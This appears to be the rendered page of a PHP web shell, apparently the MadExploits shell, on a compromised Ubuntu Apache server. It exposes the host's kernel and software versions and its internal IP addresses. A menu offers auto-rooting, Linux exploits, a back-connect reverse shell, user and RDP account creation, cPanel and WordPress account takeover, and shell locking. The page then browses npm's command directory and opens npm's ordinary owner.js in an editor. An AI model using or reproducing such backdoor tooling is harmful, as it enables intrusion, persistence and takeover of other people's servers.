Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
npm /
lib /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
access.js
5.16
KB
-rw-r--r--
adduser.js
1.85
KB
-rw-r--r--
audit.js
1.5
KB
-rw-r--r--
bin.js
491
B
-rw-r--r--
birthday.js
262
B
-rw-r--r--
bugs.js
1.49
KB
-rw-r--r--
cache.js
7.04
KB
-rw-r--r--
ci.js
3.7
KB
-rw-r--r--
completion.js
8.89
KB
-rw-r--r--
config.js
7.94
KB
-rw-r--r--
dedupe.js
1.35
KB
-rw-r--r--
deprecate.js
2.07
KB
-rw-r--r--
diff.js
7.82
KB
-rw-r--r--
dist-tag.js
5.29
KB
-rw-r--r--
docs.js
1.34
KB
-rw-r--r--
doctor.js
9.39
KB
-rw-r--r--
edit.js
1.39
KB
-rw-r--r--
exec.js
2.56
KB
-rw-r--r--
explain.js
3.47
KB
-rw-r--r--
explore.js
2.29
KB
-rw-r--r--
find-dupes.js
602
B
-rw-r--r--
fund.js
6.44
KB
-rw-r--r--
get.js
483
B
-rw-r--r--
help-search.js
5.51
KB
-rw-r--r--
help.js
3.84
KB
-rw-r--r--
hook.js
4.04
KB
-rw-r--r--
init.js
6.21
KB
-rw-r--r--
install-ci-test.js
377
B
-rw-r--r--
install-test.js
374
B
-rw-r--r--
install.js
5.36
KB
-rw-r--r--
link.js
5.13
KB
-rw-r--r--
ll.js
234
B
-rw-r--r--
logout.js
1.32
KB
-rw-r--r--
ls.js
17.06
KB
-rw-r--r--
org.js
4.5
KB
-rw-r--r--
outdated.js
8.89
KB
-rw-r--r--
owner.js
6.04
KB
-rw-r--r--
pack.js
2.23
KB
-rw-r--r--
ping.js
839
B
-rw-r--r--
pkg.js
3.44
KB
-rw-r--r--
prefix.js
303
B
-rw-r--r--
profile.js
11.24
KB
-rw-r--r--
prune.js
764
B
-rw-r--r--
publish.js
6.13
KB
-rw-r--r--
rebuild.js
2.16
KB
-rw-r--r--
repo.js
2.17
KB
-rw-r--r--
restart.js
309
B
-rw-r--r--
root.js
258
B
-rw-r--r--
run-script.js
6.83
KB
-rw-r--r--
search.js
2.48
KB
-rw-r--r--
set-script.js
2.47
KB
-rw-r--r--
set.js
531
B
-rw-r--r--
shrinkwrap.js
2.62
KB
-rw-r--r--
star.js
1.99
KB
-rw-r--r--
stars.js
1011
B
-rw-r--r--
start.js
299
B
-rw-r--r--
stop.js
294
B
-rw-r--r--
team.js
4.59
KB
-rw-r--r--
test.js
294
B
-rw-r--r--
token.js
6.88
KB
-rw-r--r--
uninstall.js
1.56
KB
-rw-r--r--
unpublish.js
4.59
KB
-rw-r--r--
unstar.js
348
B
-rw-r--r--
update.js
1.7
KB
-rw-r--r--
version.js
3.12
KB
-rw-r--r--
view.js
14.1
KB
-rw-r--r--
whoami.js
523
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : owner.js
const npa = require('npm-package-arg') const npmFetch = require('npm-registry-fetch') const pacote = require('pacote') const log = require('../utils/log-shim') const otplease = require('../utils/otplease.js') const readLocalPkgName = require('../utils/read-package-name.js') const BaseCommand = require('../base-command.js') class Owner extends BaseCommand { static description = 'Manage package owners' static name = 'owner' static params = [ 'registry', 'otp', ] static usage = [ 'add <user> [<@scope>/]<pkg>', 'rm <user> [<@scope>/]<pkg>', 'ls [<@scope>/]<pkg>', ] async completion (opts) { const argv = opts.conf.argv.remain if (argv.length > 3) { return [] } if (argv[1] !== 'owner') { argv.unshift('owner') } if (argv.length === 2) { return ['add', 'rm', 'ls'] } // reaches registry in order to autocomplete rm if (argv[2] === 'rm') { if (this.npm.config.get('global')) { return [] } const pkgName = await readLocalPkgName(this.npm.prefix) if (!pkgName) { return [] } const spec = npa(pkgName) const data = await pacote.packument(spec, { ...this.npm.flatOptions, fullMetadata: true, }) if (data && data.maintainers && data.maintainers.length) { return data.maintainers.map(m => m.name) } } return [] } async exec ([action, ...args]) { const opts = { ...this.npm.flatOptions, log, } switch (action) { case 'ls': case 'list': return this.ls(args[0], opts) case 'add': return this.add(args[0], args[1], opts) case 'rm': case 'remove': return this.rm(args[0], args[1], opts) default: throw this.usageError() } } async ls (pkg, opts) { if (!pkg) { if (this.npm.config.get('global')) { throw this.usageError() } const pkgName = await readLocalPkgName(this.npm.prefix) if (!pkgName) { throw this.usageError() } pkg = pkgName } const spec = npa(pkg) try { const packumentOpts = { ...opts, fullMetadata: true } const { maintainers } = await pacote.packument(spec, packumentOpts) if (!maintainers || !maintainers.length) { this.npm.output('no admin found') } else { this.npm.output(maintainers.map(o => `${o.name} <${o.email}>`).join('\n')) } return maintainers } catch (err) { log.error('owner ls', "Couldn't get owner data", pkg) throw err } } async add (user, pkg, opts) { if (!user) { throw this.usageError() } if (!pkg) { if (this.npm.config.get('global')) { throw this.usageError() } const pkgName = await readLocalPkgName(this.npm.prefix) if (!pkgName) { throw this.usageError() } pkg = pkgName } log.verbose('owner add', '%s to %s', user, pkg) const spec = npa(pkg) return this.putOwners(spec, user, opts, (newOwner, owners) => this.validateAddOwner(newOwner, owners)) } async rm (user, pkg, opts) { if (!user) { throw this.usageError() } if (!pkg) { if (this.npm.config.get('global')) { throw this.usageError() } const pkgName = await readLocalPkgName(this.npm.prefix) if (!pkgName) { throw this.usageError() } pkg = pkgName } log.verbose('owner rm', '%s from %s', user, pkg) const spec = npa(pkg) return this.putOwners(spec, user, opts, (rmOwner, owners) => this.validateRmOwner(rmOwner, owners)) } async putOwners (spec, user, opts, validation) { const uri = `/-/user/org.couchdb.user:${encodeURIComponent(user)}` let u = '' try { u = await npmFetch.json(uri, opts) } catch (err) { log.error('owner mutate', `Error getting user data for ${user}`) throw err } if (user && (!u || !u.name || u.error)) { throw Object.assign( new Error( "Couldn't get user data for " + user + ': ' + JSON.stringify(u) ), { code: 'EOWNERUSER' } ) } // normalize user data u = { name: u.name, email: u.email } const data = await pacote.packument(spec, { ...opts, fullMetadata: true }) // save the number of maintainers before validation for comparison const before = data.maintainers ? data.maintainers.length : 0 const m = validation(u, data.maintainers) if (!m) { return } // invalid owners const body = { _id: data._id, _rev: data._rev, maintainers: m, } const dataPath = `/${spec.escapedName}/-rev/${encodeURIComponent(data._rev)}` const res = await otplease(opts, opts => { return npmFetch.json(dataPath, { ...opts, method: 'PUT', body, spec, log, }) }) if (!res.error) { if (m.length < before) { this.npm.output(`- ${user} (${spec.name})`) } else { this.npm.output(`+ ${user} (${spec.name})`) } } else { throw Object.assign( new Error('Failed to update package: ' + JSON.stringify(res)), { code: 'EOWNERMUTATE' } ) } return res } validateAddOwner (newOwner, owners) { owners = owners || [] for (const o of owners) { if (o.name === newOwner.name) { log.info( 'owner add', 'Already a package owner: ' + o.name + ' <' + o.email + '>' ) return false } } return [ ...owners, newOwner, ] } validateRmOwner (rmOwner, owners) { let found = false const m = owners.filter(function (o) { var match = (o.name === rmOwner.name) found = found || match return !match }) if (!found) { log.info('owner rm', 'Not a package owner: ' + rmOwner.name) return false } if (!m.length) { throw Object.assign( new Error( 'Cannot remove all owners of a package. Add someone else first.' ), { code: 'EOWNERRM' } ) } return m } } module.exports = Owner
Close